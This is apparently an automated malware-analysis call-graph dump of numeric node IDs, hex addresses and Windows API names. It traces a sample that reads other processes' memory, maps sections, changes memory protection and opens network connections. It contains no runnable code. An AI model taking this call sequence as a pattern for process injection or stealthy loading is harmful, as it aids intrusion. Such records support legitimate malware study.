53065->53058 53066 6c85bb54 memcmp 53065->53066 53066->53065 53066->53067 53067->53060 53067->53063 53068->52965 53069->52967 53070->53062 53071->53067 53072->52986 53073->53001 53074->53007 53075->53016 53076->53033 53077->52987 53078->52991 53079->53008 53080->53031 53081->53031 53082->53049 53083->53046 53084 6c86bb00 53103 6c86b1e0 53084->53103 53088 6c86bb65 53091 6c86b1e0 8 API calls 
53088->53091 53089 6c86bc9d 53094 6c9459b0 83 API calls 53089->53094 53092 6c86bb89 53091->53092 53092->53089 53093 6c86bb91 53092->53093 53095 6c86bbfa 53093->53095 53096 6c86bb9a 53093->53096 53097 6c86bcf8 53094->53097 53155 6c86b300 245 API calls 53095->53155 53098 6c86bb24 53096->53098 53099 6c86bc48 53096->53099 53106 6c86ae60 53098->53106 53156 6c86b830 231 API calls 53099->53156 53102 6c86bbed 53104 6c86b1ef 53103->53104 53157 6c86f0d0 53103->53157 53104->53089 53104->53098 53128 6c89c720 53104->53128 53107 6c86aef9 53106->53107 53109 6c86aef4 53106->53109 53208 6c87f6b0 128 API calls 53107->53208 53118 6c86af68 53109->53118 53209 6c8a36b0 53109->53209 53111 6c86b04e 53112 6c86b079 53111->53112 53119 6c86b13c 53111->53119 53213 6c8a4160 105 API calls 53111->53213 53112->53102 53115 6c86b0a2 53202 6c876df0 53115->53202 53118->53111 53118->53115 53120 6c86b038 53118->53120 53169 6c87f530 53118->53169 53176 6c87f890 53118->53176 53214 6c86c730 HeapFree CloseHandle GetLastError 53119->53214 53120->53111 53189 6c89e0f0 53120->53189 53123 6c86b1b6 53124 6c9459b0 83 API calls 53123->53124 53125 6c86b1d1 53124->53125 53126 6c86f0d0 8 API calls 53125->53126 53127 6c86b1ef 53126->53127 53127->53102 53129 6c89c737 53128->53129 53132 6c89c75d 53128->53132 53603 6c8fd470 53129->53603 53131 6c89c76a 53131->53088 53132->53131 53134 6c89c777 53132->53134 53136 6c89c7ce 53132->53136 53133 6c89c7bc 53138 6c85ac40 HeapFree 53133->53138 53134->53131 53134->53133 53137 6c85ac40 HeapFree 53134->53137 53135 6c89c809 53140 6c85ac40 HeapFree 53135->53140 53136->53135 53139 6c85ac40 HeapFree 53136->53139 53137->53133 53138->53131 53139->53135 53141 6c89c816 53140->53141 53142 6c9459b0 83 API calls 53141->53142 53143 6c89c81f 53142->53143 53605 6c89b7a0 HeapFree 53143->53605 53145 6c89c827 53146 6c9459b0 83 API calls 53145->53146 53147 6c89c848 53146->53147 53148 6c89c8aa 53147->53148 53149 6c89c8b4 53147->53149 53606 6c89b640 HeapFree 53148->53606 53151 6c8fd470 3 API calls 
53149->53151 53153 6c89c916 53151->53153 53152 6c89c8b2 53152->53088 53153->53152 53607 6c89b640 HeapFree 53153->53607 53155->53102 53156->53102 53158 6c86f0e0 TlsGetValue 53157->53158 53159 6c86f159 53157->53159 53161 6c86f0ec 53158->53161 53167 6c86f106 53158->53167 53160 6c86f15f TlsGetValue 53159->53160 53160->53161 53160->53167 53162 6c85ac30 3 API calls 53161->53162 53161->53167 53163 6c86f11d 53162->53163 53164 6c86f124 TlsGetValue TlsSetValue 53163->53164 53165 6c86f175 53163->53165 53166 6c86f141 53164->53166 53164->53167 53168 6c85ac40 HeapFree 53166->53168 53167->53104 53168->53167 53170 6c87f554 53169->53170 53171 6c87f59e 53169->53171 53172 6c87f5c1 53170->53172 53174 6c87f55a 53170->53174 53171->53118 53172->53171 53215 6c87f6b0 128 API calls 53172->53215 53174->53171 53216 6c87f6b0 128 API calls 53174->53216 53217 6c87fb40 53176->53217 53180 6c87f8bf 53246 6c8a5ba0 89 API calls 53180->53246 53183 6c87f8f7 53187 6c87f95e 53183->53187 53248 6c8a7380 108 API calls 53183->53248 53184 6c87f8c5 53186 6c87f8b0 53184->53186 53247 6c8a7380 108 API calls 53184->53247 53220 6c87f9c0 53186->53220 53187->53118 53190 6c89e262 53189->53190 53195 6c89e107 53189->53195 53190->53111 53194 6c8a36b0 230 API calls 53194->53190 53195->53190 53196 6c8a36b0 230 API calls 53195->53196 53198 6c89e18f 53195->53198 53199 6c8d2340 SwitchToThread 53195->53199 53308 6c89e570 53195->53308 53315 6c89eaf0 53195->53315 53328 6c89e300 53195->53328 53337 6c879b90 53195->53337 53367 6c87a470 53195->53367 53380 6c8a3400 230 API calls 53195->53380 53196->53195 53198->53194 53199->53195 53203 6c876e73 53202->53203 53204 6c9459b0 83 API calls 53203->53204 53205 6c876ead 53204->53205 53206 6c9459b0 83 API calls 53205->53206 53207 6c876f66 53206->53207 53208->53109 53210 6c8a36e6 53209->53210 53212 6c8a36bd 53209->53212 53210->53118 53212->53210 53487 6c8a36f0 53212->53487 53214->53123 53215->53171 53216->53171 53249 6c86eea0 53217->53249 53219 6c87f8ac 53219->53186 53245 6c8a6290 
WaitOnAddress GetLastError WakeByAddressAll 53219->53245 53221 6c87fb40 125 API calls 53220->53221 53222 6c87f9cd 53221->53222 53223 6c87fa36 53222->53223 53224 6c87f9d1 53222->53224 53302 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53223->53302 53225 6c87f9e5 53224->53225 53226 6c87fad4 53224->53226 53232 6c87fa2b 53225->53232 53301 6c8a68a0 104 API calls 53225->53301 53306 6c87feb0 108 API calls 53226->53306 53228 6c87fa3b 53303 6c8a5ba0 89 API calls 53228->53303 53231 6c87fa41 53231->53226 53237 6c87fa58 53231->53237 53232->53183 53234 6c87fafc 53235 6c87fb1c 53234->53235 53307 6c8a7380 108 API calls 53234->53307 53240 6c9459b0 83 API calls 53235->53240 53236 6c87fa9e 53236->53232 53305 6c8a7380 108 API calls 53236->53305 53237->53236 53304 6c8a68a0 104 API calls 53237->53304 53242 6c87fb3b 53240->53242 53243 6c86eea0 125 API calls 53242->53243 53244 6c87fb50 53243->53244 53244->53183 53245->53180 53246->53184 53247->53186 53248->53187 53250 6c86eeb4 TlsGetValue 53249->53250 53251 6c86ef65 53249->53251 53252 6c86eec4 53250->53252 53261 6c86ef53 53250->53261 53253 6c86ef6b TlsGetValue 53251->53253 53254 6c86eeea 53252->53254 53252->53261 53297 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53252->53297 53253->53252 53253->53261 53257 6c85ac30 3 API calls 53254->53257 53256 6c86eee4 53298 6c8a5ba0 89 API calls 53256->53298 53259 6c86ef00 53257->53259 53260 6c86ef07 TlsGetValue TlsSetValue 53259->53260 53263 6c86ef81 53259->53263 53260->53261 53262 6c86ef24 53260->53262 53261->53219 53264 6c86ef46 53262->53264 53299 6c8a7380 108 API calls 53262->53299 53265 6c85ac40 HeapFree 53263->53265 53267 6c85ac40 HeapFree 53264->53267 53268 6c86ef9b 53265->53268 53267->53261 53269 6c9459b0 83 API calls 53268->53269 53270 6c86efa4 53269->53270 53271 6c86efc6 53270->53271 53300 6c8a7380 108 API calls 53270->53300 53272 6c9459b0 83 API calls 53271->53272 53274 6c86efcf 53272->53274 53275 6c86eff9 TlsGetValue 53274->53275 53276 6c86f08e 53275->53276 53277 6c86f009 
53275->53277 53276->53219 53277->53276 53278 6c86f02c ProcessPrng 53277->53278 53279 6c86f046 53277->53279 53278->53279 53280 6c85ac30 3 API calls 53279->53280 53281 6c86f05b 53280->53281 53282 6c86f062 TlsGetValue TlsSetValue 53281->53282 53283 6c86f0bc 53281->53283 53282->53276 53284 6c86f084 53282->53284 53286 6c86f0e0 TlsGetValue 53283->53286 53287 6c86f159 53283->53287 53285 6c85ac40 HeapFree 53284->53285 53285->53276 53288 6c86f106 53286->53288 53290 6c86f0ec 53286->53290 53289 6c86f15f TlsGetValue 53287->53289 53288->53219 53289->53288 53289->53290 53290->53288 53291 6c85ac30 3 API calls 53290->53291 53292 6c86f11d 53291->53292 53293 6c86f124 TlsGetValue TlsSetValue 53292->53293 53294 6c86f175 53292->53294 53293->53288 53295 6c86f141 53293->53295 53296 6c85ac40 HeapFree 53295->53296 53296->53288 53297->53256 53298->53254 53299->53264 53300->53271 53301->53232 53302->53228 53303->53231 53304->53236 53305->53232 53306->53234 53307->53235 53309 6c89e594 53308->53309 53311 6c89e5de 53308->53311 53310 6c89e601 53309->53310 53313 6c89e59a 53309->53313 53310->53311 53381 6c89e6f0 120 API calls 53310->53381 53311->53195 53313->53311 53382 6c89e6f0 120 API calls 53313->53382 53383 6c89f1a0 53315->53383 53318 6c89eb10 53386 6c89f020 53318->53386 53320 6c89eb1f 53412 6c8a5ba0 89 API calls 53320->53412 53323 6c89eb25 53323->53318 53413 6c8a7380 108 API calls 53323->53413 53325 6c89ebbe 53325->53195 53326 6c89eb57 53326->53325 53414 6c8a7380 108 API calls 53326->53414 53329 6c89e570 120 API calls 53328->53329 53331 6c89e317 53329->53331 53330 6c89eaf0 117 API calls 53330->53331 53331->53330 53332 6c89e342 53331->53332 53335 6c89e452 53331->53335 53332->53335 53336 6c89e431 53332->53336 53452 6c8a2c00 117 API calls 53332->53452 53335->53195 53336->53335 53453 6c89ee00 HeapFree SwitchToThread 53336->53453 53338 6c879cb8 53337->53338 53339 6c879bc0 53337->53339 53341 6c879cda 53338->53341 53345 6c85ac40 HeapFree 53338->53345 53340 6c879c0d 53339->53340 53343 6c879c04 
53339->53343 53344 6c879c12 53339->53344 53340->53338 53342 6c879c64 53340->53342 53457 6c8a4170 153 API calls 53341->53457 53346 6c879cad 53342->53346 53348 6c879c77 53342->53348 53455 6c89dc90 230 API calls 53342->53455 53454 6c880380 HeapFree CloseHandle GetLastError 53343->53454 53344->53340 53351 6c85ac40 HeapFree 53344->53351 53345->53341 53346->53195 53348->53346 53456 6c85f270 HeapFree 53348->53456 53351->53340 53368 6c87a49b 53367->53368 53372 6c87a5bf 53367->53372 53458 6c878670 53368->53458 53371 6c87a504 53461 6c8782f0 53371->53461 53483 6c8eada0 102 API calls 53372->53483 53375 6c87a559 53481 6c878920 HeapFree CloseHandle GetLastError 53375->53481 53377 6c87a58d 53482 6c878db0 16 API calls 53377->53482 53379 6c87a5b7 53379->53195 53380->53195 53381->53311 53382->53311 53415 6c8a0750 53383->53415 53387 6c89f1a0 117 API calls 53386->53387 53388 6c89f02d 53387->53388 53389 6c89f031 53388->53389 53390 6c89f096 53388->53390 53392 6c89f045 53389->53392 53399 6c89f134 53389->53399 53446 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53390->53446 53397 6c89f08b 53392->53397 53445 6c8a68a0 104 API calls 53392->53445 53393 6c89f09b 53447 6c8a5ba0 89 API calls 53393->53447 53396 6c89f0a1 53398 6c89f0b8 53396->53398 53396->53399 53397->53326 53406 6c89f0fe 53398->53406 53448 6c8a68a0 104 API calls 53398->53448 53450 6c89f200 108 API calls 53399->53450 53401 6c89f15c 53407 6c89f17c 53401->53407 53451 6c8a7380 108 API calls 53401->53451 53405 6c9459b0 83 API calls 53408 6c89f19b 53405->53408 53406->53397 53449 6c8a7380 108 API calls 53406->53449 53407->53405 53409 6c8a0750 117 API calls 53408->53409 53410 6c89f1b0 53409->53410 53410->53326 53411 6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53411->53320 53412->53323 53413->53318 53414->53325 53416 6c8a0764 TlsGetValue 53415->53416 53417 6c8a0815 53415->53417 53418 6c8a0774 53416->53418 53428 6c89eb0c 53416->53428 53419 6c8a081b TlsGetValue 53417->53419 53425 6c8a079a 53418->53425 53418->53428 53441 
6c8a6290 WaitOnAddress GetLastError WakeByAddressAll 53418->53441 53419->53418 53419->53428 53421 6c8a0794 53442 6c8a5ba0 89 API calls 53421->53442 53422 6c85ac30 3 API calls 53424 6c8a07b0 53422->53424 53426 6c8a0831 53424->53426 53427 6c8a07b7 TlsGetValue TlsSetValue 53424->53427 53425->53422 53432 6c85ac40 HeapFree 53426->53432 53427->53428 53429 6c8a07d4 53427->53429 53428->53318 53428->53411 53430 6c8a07f6 53429->53430 53443 6c8a7380 108 API calls 53429->53443 53431 6c85ac40 HeapFree 53430->53431 53431->53428 53434 6c8a084b 53432->53434 53435 6c9459b0 83 API calls 53434->53435 53436 6c8a0854 53435->53436 53437 6c8a0876 53436->53437 53444 6c8a7380 108 API calls 53436->53444 53439 6c9459b0 83 API calls 53437->53439 53440 6c8a087f 53439->53440 53441->53421 53442->53425 53443->53430 53444->53437 53445->53397 53446->53393 53447->53396 53448->53406 53449->53397 53450->53401 53451->53407 53452->53332 53453->53336 53454->53340 53455->53348 53456->53346 53459 6c86f0d0 8 API calls 53458->53459 53460 6c878680 53459->53460 53460->53371 53460->53372 53462 6c878389 53461->53462 53464 6c878384 53461->53464 53484 6c87f6b0 128 API calls 53462->53484 53465 6c8a36b0 230 API calls 53464->53465 53473 6c8783f8 53464->53473 53465->53473 53466 6c8784de 53468 6c878509 53466->53468 53474 6c8785cc 53466->53474 53485 6c8a4160 105 API calls 53466->53485 53467 6c87f530 128 API calls 53467->53473 53468->53375 53470 6c878532 53471 6c876df0 83 API calls 53470->53471 53471->53468 53472 6c87f890 125 API calls 53472->53473 53473->53466 53473->53467 53473->53470 53473->53472 53475 6c8784c8 53473->53475 53486 6c878be0 HeapFree CloseHandle GetLastError 53474->53486 53475->53466 53477 6c89e0f0 230 API calls 53475->53477 53477->53466 53478 6c878646 53479 6c9459b0 83 API calls 53478->53479 53480 6c878661 53479->53480 53481->53377 53482->53379 53483->53375 53484->53464 53486->53478 53488 6c8a37ea 53487->53488 53489 6c8a3704 53487->53489 53506 6c8a3030 53488->53506 53490 6c8a371f 53489->53490 53533 
6c8fd2a0 WaitOnAddress GetLastError 53489->53533 53492 6c8a3730 53490->53492 53534 6c8ead60 12 API calls 53490->53534 53495 6c8a374f 53492->53495 53498 6c8a376c 53492->53498 53532 6c8e6a10 WakeByAddressSingle 53492->53532 53495->53498 53536 6c8ead60 12 API calls 53495->53536 53496 6c8a3804 53500 6c9459b0 83 API calls 53496->53500 53499 6c8a3777 53498->53499 53535 6c8fd340 WakeByAddressSingle 53498->53535 53499->53212 53503 6c8a381c 53500->53503 53513 6c89c210 53503->53513 53505 6c8a3883 53505->53212 53507 6c8a3039 53506->53507 53512 6c8a3047 53506->53512 53507->53512 53538 6c8ead60 12 API calls 53507->53538 53508 6c8a304f 53508->53496 53511 6c8a3058 53511->53496 53512->53508 53537 6c8fd340 WakeByAddressSingle 53512->53537 53539 6c89dcb0 53513->53539 53515 6c89c22c 53562 6c89e520 53515->53562 53519 6c89c335 53578 6c89b8a0 91 API calls 53519->53578 53521 6c89c4b3 53522 6c9459b0 83 API calls 53521->53522 53531 6c89c4b9 53522->53531 53524 6c89c2e3 53524->53519 53526 6c89c2f4 53524->53526 53525 6c89e0f0 230 API calls 53525->53524 53527 6c89c110 16 API calls 53526->53527 53528 6c89c303 53527->53528 53577 6c89b8a0 91 API calls 53528->53577 53530 6c89c32d 53530->53505 53531->53505 53532->53495 53533->53490 53534->53492 53535->53499 53536->53498 53537->53511 53538->53512 53540 6c85ac30 3 API calls 53539->53540 53541 6c89dcf7 53540->53541 53542 6c89dd02 memset 53541->53542 53543 6c89df85 53541->53543 53544 6c89dd20 53542->53544 53545 6c89dfa9 53543->53545 53579 6c8a1af0 HeapFree 53543->53579 53550 6c85ac40 HeapFree 53544->53550 53551 6c89df78 53544->53551 53547 6c89dfbd 53545->53547 53580 6c8a1af0 HeapFree 53545->53580 53549 6c89dfd6 53547->53549 53554 6c85ac40 HeapFree 53547->53554 53552 6c89dfea 53549->53552 53581 6c8a1770 HeapFree 53549->53581 53550->53551 53551->53515 53553 6c9459b0 83 API calls 53552->53553 53556 6c89dff3 53553->53556 53554->53549 53557 6c89e520 8 API calls 53556->53557 53559 6c89e00b 53557->53559 53558 6c89e016 53558->53515 53559->53558 53560 6c89e520 
8 API calls 53559->53560 53561 6c89e05b 53560->53561 53561->53515 53582 6c8a0890 53562->53582 53564 6c89c236 53564->53519 53565 6c89c110 53564->53565 53566 6c89c129 53565->53566 53567 6c89c170 53565->53567 53569 6c89c137 53566->53569 53600 6c8ead60 12 API calls 53566->53600 53599 6c8fd2a0 WaitOnAddress GetLastError 53567->53599 53576 6c89c160 53569->53576 53598 6c8e6a30 WakeByAddressAll 53569->53598 53572 6c89c14b 53572->53576 53602 6c8ead60 12 API calls 53572->53602 53573 6c89c168 53573->53519 53573->53524 53573->53525 53576->53573 53601 6c8fd340 WakeByAddressSingle 53576->53601 53577->53530 53578->53521 53579->53545 53580->53547 53581->53552 53583 6c8a0919 53582->53583 53584 6c8a08a0 TlsGetValue 53582->53584 53586 6c8a091f TlsGetValue 53583->53586 53585 6c8a08c6 53584->53585 53587 6c8a08ac 53584->53587 53585->53564 53586->53585 53586->53587 53587->53585 53588 6c85ac30 3 API calls 53587->53588 53589 6c8a08dd 53588->53589 53590 6c8a08e4 TlsGetValue TlsSetValue 53589->53590 53591 6c8a0935 53589->53591 53590->53585 53592 6c8a0901 53590->53592 53594 6c8a09c6 53591->53594 53597 6c85ac40 HeapFree 53591->53597 53593 6c85ac40 HeapFree 53592->53593 53593->53585 53595 6c85ac40 HeapFree 53594->53595 53596 6c8a09dd 53594->53596 53595->53596 53596->53564 53597->53591 53598->53572 53599->53566 53600->53569 53601->53573 53602->53576 53608 6c8fd485 53603->53608 53605->53145 53606->53152 53607->53152 53609 6c8fd48a 53608->53609 53612 6c8fd4ff 53608->53612 53610 6c8fd5c1 53609->53610 53611 6c8fd4d6 WaitOnAddress 53609->53611 53609->53612 53611->53609 53613 6c8fd4e6 GetLastError 53611->53613 53612->53610 53614 6c8fd5ba WakeByAddressAll 53612->53614 53613->53609 53614->53610 53615 6c874c20 53616 6c874c3e 53615->53616 53627 6c874d2c 53615->53627 53617 6c874cb4 GetProcessTimes 53616->53617 53618 6c874d02 GetSystemTimes 53616->53618 53617->53618 53619 6c874cd0 53617->53619 53621 6c874d27 53618->53621 53618->53627 53759 6c89a6b0 GetLastError 53619->53759 53620 6c874fd0 
GetProcessIoCounters 53623 6c87501b 53620->53623 53628 6c874fe4 53620->53628 53760 6c89a6b0 GetLastError 53621->53760 53761 6c89a6b0 GetLastError 53623->53761 53625 6c874cd5 53625->53618 53627->53620 53627->53628 53629 6c875176 53628->53629 53632 6c8750a7 OpenProcessToken 53628->53632 53630 6c875b5d 53629->53630 53631 6c87532b NtQueryInformationProcess 53629->53631 53640 6c875b98 memset 53630->53640 53672 6c875be0 53630->53672 53631->53630 53633 6c875357 NtQueryInformationProcess 53631->53633 53634 6c875171 53632->53634 53635 6c8750c0 53632->53635 53633->53630 53638 6c87538a 53633->53638 53764 6c89a6b0 GetLastError 53634->53764 53635->53629 53639 6c8750d0 GetTokenInformation 53635->53639 53638->53630 53641 6c8753b2 53638->53641 53642 6c8751e4 53639->53642 53643 6c8750fe GetProcessHeap 53639->53643 53758 6c8898f0 53640->53758 53645 6c875494 ReadProcessMemory 53641->53645 53646 6c8753ba ReadProcessMemory 53641->53646 53766 6c89a6b0 GetLastError 53642->53766 53647 6c875116 HeapAlloc 53643->53647 53648 6c8751ac 53643->53648 53655 6c8754b6 ReadProcessMemory 53645->53655 53651 6c8753db ReadProcessMemory 53646->53651 53653 6c875127 GetTokenInformation 53647->53653 53654 6c875258 CloseHandle 53647->53654 53765 6c89a6b0 GetLastError 53648->53765 53649 6c875bbb GetModuleFileNameExW 53649->53672 53657 6c875402 memcpy 53651->53657 53659 6c875142 53653->53659 53660 6c87522a 53653->53660 53654->53629 53662 6c8755fd 53654->53662 53661 6c8754da 53655->53661 53656 6c8751e9 53656->53643 53658 6c8751b1 53656->53658 53683 6c875435 53657->53683 53658->53654 53664 6c8751d2 53658->53664 53762 6c8626d0 92 API calls 53659->53762 53767 6c89a6b0 GetLastError 53660->53767 53687 6c875581 VirtualQueryEx 53661->53687 53691 6c876890 NtQueryInformationProcess 53661->53691 53662->53634 53664->53654 53666 6c87522f 53669 6c875241 53666->53669 53667 6c875151 53670 6c875165 53667->53670 53671 6c875604 53667->53671 53768 6c874370 GetProcessHeap HeapFree GetLastError 53669->53768 53763 6c874370 
GetProcessHeap HeapFree GetLastError 53670->53763 53676 6c875638 53671->53676 53681 6c85ac40 HeapFree 53671->53681 53673 6c8757b8 53729 6c8765b0 53673->53729 53770 6c874370 GetProcessHeap HeapFree GetLastError 53676->53770 53680 6c87516c 53684 6c861300 2 API calls 53680->53684 53681->53676 53682 6c87555e 53769 6c87e530 HeapFree 53682->53769 53683->53645 53684->53629 53686 6c875564 53686->53687 53689 6c85ac40 HeapFree 53686->53689 53687->53673 53688 6c8757d5 53690 6c85ac40 HeapFree 53688->53690 53689->53687 53690->53688 53692 6c8768b1 53691->53692 53693 6c8768bc 53691->53693 53777 6c89a890 GetErrorInfo 53692->53777 53694 6c8769a6 53693->53694 53696 6c85ac30 3 API calls 53693->53696 53708 6c876965 53693->53708 53698 6c85ac40 HeapFree 53694->53698 53697 6c87692c 53696->53697 53697->53694 53699 6c876933 NtQueryInformationProcess 53697->53699 53700 6c8769c2 53698->53700 53701 6c87696a 53699->53701 53702 6c876949 53699->53702 53703 6c9459b0 83 API calls 53700->53703 53704 6c85ac40 HeapFree 53701->53704 53771 6c876440 CommandLineToArgvW 53702->53771 53710 6c8769cb 53703->53710 53704->53708 53707 6c85ac40 HeapFree 53707->53708 53708->53682 53709 6c876a01 53712 6c876a92 53709->53712 53713 6c876a0e 53709->53713 53710->53709 53723 6c876a60 53710->53723 53778 6c86f3b0 WaitOnAddress GetLastError WakeByAddressAll 53710->53778 53715 6c8765b0 91 API calls 53712->53715 53714 6c876890 101 API calls 53713->53714 53721 6c876a16 53714->53721 53716 6c876aa4 53715->53716 53718 6c876440 9 API calls 53716->53718 53724 6c876ab0 53716->53724 53717 6c876a4c 53719 6c85ac40 HeapFree 53717->53719 53717->53723 53722 6c876ad4 53718->53722 53719->53723 53720 6c876b1c 53720->53723 53726 6c85ac40 HeapFree 53720->53726 53721->53717 53725 6c85ac40 HeapFree 53721->53725 53722->53724 53727 6c85ac40 HeapFree 53722->53727 53723->53682 53724->53720 53728 6c85ac40 HeapFree 53724->53728 53725->53721 53726->53723 53727->53724 53728->53724 53730 6c8765cd 53729->53730 53731 6c876694 53729->53731 53730->53731 
53732 6c85ac30 3 API calls 53730->53732 53734 6c85ac40 HeapFree 53731->53734 53733 6c8765ec 53732->53733 53733->53731 53735 6c8765f7 ReadProcessMemory 53733->53735 53736 6c8766b0 53734->53736 53738 6c876635 53735->53738 53741 6c87661a 53735->53741 53737 6c9459b0 83 API calls 53736->53737 53743 6c8766b9 53737->53743 53781 6c89a6b0 GetLastError 53738->53781 53739 6c876622 53739->53688 53741->53739 53742 6c85ac40 HeapFree 53741->53742 53742->53739 53744 6c8765b0 90 API calls 53743->53744 53748 6c876709 53743->53748 53745 6c876739 53744->53745 53746 6c876746 53745->53746 53749 6c876769 53745->53749 53747 6c85ac40 HeapFree 53746->53747 53746->53748 53747->53748 53748->53688 53782 6c876350 6 API calls 53749->53782 53751 6c8767d0 53752 6c87681d 53751->53752 53753 6c8767d9 53751->53753 53754 6c85ac40 HeapFree 53752->53754 53757 6c876805 53752->53757 53755 6c85ac40 HeapFree 53753->53755 53753->53757 53754->53757 53755->53757 53756 6c85ac40 HeapFree 53756->53748 53757->53748 53757->53756 53758->53649 53759->53625 53760->53627 53761->53628 53762->53667 53763->53680 53764->53629 53765->53658 53766->53656 53767->53666 53768->53654 53769->53686 53770->53680 53772 6c876502 53771->53772 53775 6c876460 53771->53775 53772->53707 53773 6c8764e6 LocalFree 53773->53772 53775->53773 53779 6c8929c0 wcslen 53775->53779 53780 6c85f810 6 API calls 53775->53780 53777->53693 53778->53709 53779->53775 53780->53775 53781->53741 53782->53751 53783 6c8f9aa0 SetThreadStackGuarantee 53784 6c8f9ac5 53783->53784 53785 6c8f9ad9 53784->53785 53786 6c85ac40 HeapFree 53784->53786 53787 6c85ac40 HeapFree 53785->53787 53786->53785 53788 6c8f9ae6 53787->53788 53789 6c85fa10 53790 6c85fa7e 53789->53790 53791 6c85fa25 53789->53791 53791->53790 53793 6c85f5a0 53791->53793 53794 6c85f5af 53793->53794 53795 6c85f5cb 53793->53795 53796 6c85f5dc 53794->53796 53797 6c85f5c1 53794->53797 53795->53790 53796->53795 53798 6c85ac30 3 API calls 53796->53798 53800 6c85ac60 6 API calls 53797->53800 53798->53795 
53800->53795 53801 6c8521f0 53802 6c85221b 53801->53802 53803 6c85220d 53801->53803 53805 6c8523b8 memcmp 53802->53805 53806 6c8523cd 53802->53806 53807 6c9328c0 53803->53807 53805->53806 53809 6c9328dc 53807->53809 53810 6c9328f6 53807->53810 53808 6c932a66 memcmp 53808->53810 53809->53808 53809->53810 53810->53802 53811 6c867c90 53812 6c867cb0 53811->53812 53813 6c867cc5 53812->53813 53817 6c866760 HeapFree CloseHandle GetLastError 53812->53817 53815 6c867cdc 53813->53815 53816 6c85ac40 HeapFree 53813->53816 53816->53815 53817->53812 53818 4fa116c 53839 4fa2713 53818->53839 53821 4fa2713 LoadLibraryA 53822 4fa11a7 53821->53822 53823 4fa2713 LoadLibraryA 53822->53823 53824 4fa11c5 53823->53824 53825 4fa11da VirtualAlloc 53824->53825 53837 4fa11ee 53824->53837 53827 4fa1208 53825->53827 53825->53837 53826 4fa2713 LoadLibraryA 53828 4fa1286 53826->53828 53827->53826 53827->53837 53831 4fa12dc 53828->53831 53828->53837 53843 4fa251a 53828->53843 53829 4fa2713 LoadLibraryA 53829->53831 53831->53829 53832 4fa133e 53831->53832 53831->53837 53832->53837 53838 4fa13a0 53832->53838 53873 4fa02fc LoadLibraryA 53832->53873 53834 4fa1389 53834->53837 53874 4fa03f7 LoadLibraryA 53834->53874 53838->53837 53847 4fa189c 53838->53847 53840 4fa272a 53839->53840 53841 4fa118f 53840->53841 53875 4fa0818 LoadLibraryA 53840->53875 53841->53821 53844 4fa252f 53843->53844 53845 4fa25a5 LoadLibraryA 53844->53845 53846 4fa25af 53844->53846 53845->53846 53846->53828 53848 4fa18d7 53847->53848 53849 4fa191e NtCreateSection 53848->53849 53850 4fa1943 53848->53850 53869 4fa1f4b 53848->53869 53849->53850 53849->53869 53851 4fa19d8 NtMapViewOfSection 53850->53851 53850->53869 53861 4fa19f8 53851->53861 53852 4fa1d21 VirtualAlloc 53857 4fa1d63 53852->53857 53853 4fa251a LoadLibraryA 53853->53861 53854 4fa251a LoadLibraryA 53860 4fa1c7f 53854->53860 53855 4fa1e14 VirtualProtect 53858 4fa1edf VirtualProtect 53855->53858 53865 4fa1e34 53855->53865 53856 4fa1d1d 53856->53852 53857->53855 53867 
4fa1e01 NtMapViewOfSection 53857->53867 53857->53869 53863 4fa1f0e 53858->53863 53859 4fa25b8 LoadLibraryA 53859->53861 53860->53852 53860->53854 53860->53856 53917 4fa25b8 LoadLibraryA 53860->53917 53861->53853 53861->53859 53861->53860 53861->53869 53862 4fa2059 53862->53869 53876 2636530 6 API calls 53862->53876 53879 263811b HeapCreate 53862->53879 53880 26377a2 53862->53880 53863->53862 53863->53869 53918 4fa22cd LoadLibraryA 53863->53918 53865->53858 53868 4fa1eb9 VirtualProtect 53865->53868 53867->53855 53867->53869 53868->53865 53869->53837 53873->53834 53874->53838 53875->53840 53919 2635e40 53876->53919 53878 2636568 CreateThread WaitForSingleObject CloseHandle Sleep 53878->53869 53924 2636120 53878->53924 53879->53869 53881 26377ae ___lock_fhandle 53880->53881 53882 26377b8 HeapSetInformation 53881->53882 53884 26377c3 53881->53884 53882->53884 54368 263811b HeapCreate 53884->54368 53885 2637811 53886 263781c 53885->53886 54437 2637779 38 API calls 3 library calls 53885->54437 54369 2639bea GetModuleHandleW 53886->54369 53889 2637822 53890 263782d __RTC_Initialize 53889->53890 54438 2637779 38 API calls 3 library calls 53889->54438 54388 263b2f6 GetStartupInfoW 53890->54388 53893 2637847 GetCommandLineW 54401 263b29e GetEnvironmentStringsW 53893->54401 53898 2637857 54408 263b1f0 GetModuleFileNameW 53898->54408 53901 263786c 54414 263afbe 53901->54414 53904 2637872 53905 263787d 53904->53905 54441 2638406 38 API calls 3 library calls 53904->54441 54428 26381e5 53905->54428 53908 2637885 53917->53860 53918->53862 53920 2635e53 _memset 53919->53920 53923 2636042 _memset 53919->53923 53921 2635ff5 RegOpenKeyExW 53920->53921 53922 263602b RegQueryValueExW 53921->53922 53921->53923 53922->53923 53923->53878 53943 2637734 53924->53943 53929 263617b 53931 26370d7 45 API calls 53929->53931 53932 263618d 53931->53932 53939 26361a0 53932->53939 53959 2635a30 CreateEventW 53932->53959 53934 2637228 38 API calls __wsetenvp 53934->53939 53935 2637734 39 API calls 
[Control-flow graph, continued from above: the rendered graph is not reproduced here; only the edge list survived extraction. Recoverable content of this part of the graph:]
• Code region at 0x2631060 to 0x263E884 (process not identified in this excerpt; MSVC CRT with C++ exception handling): Sleep, CreateEventA, WaitForSingleObject, ResetEvent, InterlockedExchange, timeGetTime, GetCurrentThreadId, socket, gethostbyname, htons, connect, setsockopt (four consecutive calls in one block), WSAIoctl, lstrlenW, WideCharToMultiByte, VirtualAlloc, VirtualFree, HeapCreate, RtlAllocateHeap, InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RaiseException, __CxxThrowException@8, RtlEncodePointer, RtlDecodePointer, TlsAlloc, TlsGetValue, TlsSetValue, GetStdHandle, GetFileType, SetHandleCount, FreeEnvironmentStringsW, GetStringTypeW, wcstoxl, GetModuleHandleW/GetProcAddress/ExitProcess (___crtCorExitProcess); CRT internals __getptd_noexit, __controlfp_s, __calloc_crt, __realloc_crt, __call_reportfault, _wparse_cmdline, __initterm_e, __cinit, ___crtMessageBoxW, __IsNonwritableInCurrentImage.
